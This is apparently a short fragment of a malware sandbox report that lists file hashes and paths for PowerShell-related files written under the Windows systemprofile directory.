MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5